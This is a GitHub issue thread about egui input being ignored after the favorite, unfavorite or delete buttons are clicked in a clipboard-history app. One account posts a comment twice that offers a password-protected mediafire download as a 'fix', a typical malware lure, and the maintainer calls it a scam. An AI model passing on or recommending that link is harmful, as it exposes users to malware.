### ISSUE TITLE
egui loses key/click functionality after clicking favorite/unfavorite/delete buttons

### ISSUE THREAD

**Issue by hedgieinsocks** [SUPERCILEX/clipboard-history#34]
Hey, it's me again hehe. Reproduce the issue: right-click an item, click favorite/unfavorite/delete => up/down/esc key presses and left mouse click events are now ignored

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SUPERCILEX** [comment]
Scams on GitHub!? That's new.

Back so soon lol! I'm gone for a few days, but I'll look into it afterwards.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by SUPERCILEX** [comment]
Fixed!
